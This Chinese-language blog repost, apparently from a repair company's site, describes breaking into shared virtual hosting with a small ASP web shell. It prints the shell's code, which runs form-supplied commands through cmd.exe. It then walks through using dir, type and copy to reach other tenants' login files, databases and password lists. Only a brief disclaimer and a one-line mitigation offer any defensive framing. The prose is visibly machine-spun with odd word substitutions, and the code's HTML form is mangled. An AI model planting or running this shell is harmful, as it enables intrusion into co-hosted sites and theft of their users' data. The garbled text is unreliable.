入侵虚拟主机的简单方案
泉源:http://www.ringz.org/
下战书忽然的一个想法,便是利用一个ASP程序(1K多点)来攻破整个假造主机,照着自己的想法竟然真的能打破假造主机,不过又多了一份担忧,要是真的如许,那网络岂不是又无安宁之日了。先让各人看这个ASP的程序:
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
Set oScript = Server.CreateObject(\"WSCRIPT.SHELL\")
Set oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")
Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")
szCMD = Request.Form(\".CMD\")
If (szCMD <> \"\") Then
szTempFile = \"C:\\\" & oFileSys.GetTempName( )
Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
\" method=\"POST\">
\">
对付搞编程的人来说,这个基础不算难,只不过是一个小小的后门程序而已。但是否想过这个的功效呢?让我说下自己的一些思路吧!
比如你买了一个空间,只是一个假造主机的空间而已,也许上面有30个网站,更大概说是50个,乃至更多。要是你把上面这个文件传到空间的一个目录上,然后再到欣赏器上执行,你会发现它有本地执行cmd.exe的功效,固然我指的是一般用户的功效。一般情况下,假造主机中会保存如许一个备份文件user.txt,里面包括了一些空间用户的资料以及暗码,可以说这个都是人们习惯了。就算你没有,固然我也可以失掉一切的一切,暂且让我称自己的空间为A吧,然后我要看到了空间B上有很多多少很多多少工具,那我就可以直接经过dir命令查找,也许你偶然中会发现一个login.asp的文件,不烦用type的命令翻开看看吧!哦,一层一层的推过去,很方便的就可以查看到了你想要的数据库文件。再大概如许吧,COPY命令说大多搞盘算机的人都会用吧,你也可以把他的文件拷贝到你空间的目录上,然后再下载到本地逐步看。还有很多的命令那就等着你自己去逐步的探索吧,就算是失掉主机的用户暗码也不再算是困难了。
特别提醒的是论坛,只需在论坛里添加一个可以上传ASP的选项目,这个主机也就可以用上述的要领入侵了。请各大论坛引起细致。
我把这个思想写出来,并不是叫各人去搞这些主机,而是想让广大用户引起细致。由于参照这篇文章而招致的后果与作者有关。 如今想到的防范要领只无限制目录权限
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
